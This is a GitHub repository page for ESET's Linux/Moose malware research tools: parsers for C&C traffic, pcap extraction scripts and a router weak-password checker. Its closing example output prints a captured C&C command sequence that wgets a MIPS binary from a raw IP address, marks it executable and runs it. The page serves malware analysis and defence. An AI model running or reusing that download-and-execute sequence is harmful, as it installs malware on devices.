Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
data
ida
lib
router-check
targeted-vendors
wireshark-profile/disable-dissectors
README.adoc
cnc1-fake-server.py
extract_sample.sh
parse_cnc1_10073reports.py
parse_cnc1_config.py
parse_cnc1_wordlist.py
parse_cnc2_nattraversal.py
parse_cnc3_response.py
parse_cnc_request.py
parse_cnc_request_bulk.py
parse_cnc_request_bulk.sh
pcap-extract-10073-socks4.sh
pcap-extract-10073-socks5.sh
pcap-extract-traffic.sh
tshark_to_raw.py

README.adoc

Linux/Moose

Copyright © 2015 ESET

Content of this repository

cnc1-fake-server.py

Run a fake configuration server that serves a static file

data/

Example captured data

extract_sample.sh

Extract telnet data. Useful to extract sample of echo infection method

ida/

IDA Python scripts

lib/

Shared code

parse_cnc1_10073reports.py

Extract messages described in the section Reporting a Peer Found to the Configuration C&C Server

parse_cnc1_config.py

Extracts C&C configuration messages

parse_cnc1_wordlist.py

Extracts usernames and passwords provided by in the C&C configuration

parse_cnc2_nattraversal.py

Extract relay C&C tunnel data

parse_cnc3_response.py

Extract report C&C responses

parse_cnc_request_bulk.py

Bulk extract config C&C requests (output to terminal)

parse_cnc_request_bulk.sh

Bulk extract config C&C requests (output to files)

parse_cnc_request.py

Extract information sent to C&C by infected bot

pcap-extract-10073-socks4.sh

Extract proxy service socks4 tunnel info

pcap-extract-10073-socks5.sh

Extract proxy service socks5 tunnel info

pcap-extract-traffic.sh

Wraps around tshark to gather interesting traffic patterns from pcaps

targeted-vendors/

List of device vendors that could be affected by Linux/Moose with instructions to test your own hardware.

router-check/

Source code for the tool that tests if your own router is reachable via Telnet and uses a weak or default username and password.

tshark_to_raw.py

Processes output of pcap-extract-traffic.sh and dumps raw binary contained in the traffic into files for further processing

wireshark-profile/

A wireshark profile that prevents the HTTP dissector from kicking in

Conventions

  • Configuration C&C Server is cnc1

  • Relay C&C Server is cnc2

  • Report C&C Server is cnc3

Extracting information from Pcap captures

Scripts exist to extract relevant information from pcaps.

pcap-extract-traffic.sh

Runs the proper tshark line. Output raw hex content to stdout.

tshark_to_raw.py

Re-assembles the TCP traffic and write it to disk.

parse_cnc_config.py

Given a raw tcp stream can extract C&C config

Example usage:

./pcap-extract-traffic.sh cnc1-response <file.pcap> | ./tshark_to_raw.py
./parse_cnc_config.py tcpstream-000022859.raw

Parsing configuration files

$ ./parse_cnc3_response.py data/cnc3-response-got-shell.raw
{'cmd_0': u'cd /var\r\n',
'cmd_1': u'rm ./elan2\r\n',
'cmd_2': u'wget http://85.159.237.107/xx/atheros_mips/elan2\r\n',
'cmd_3': u'chmod +x ./elan2\r\n',
'cmd_4': u'./elan2\r\n'}
You can’t perform that action at this time.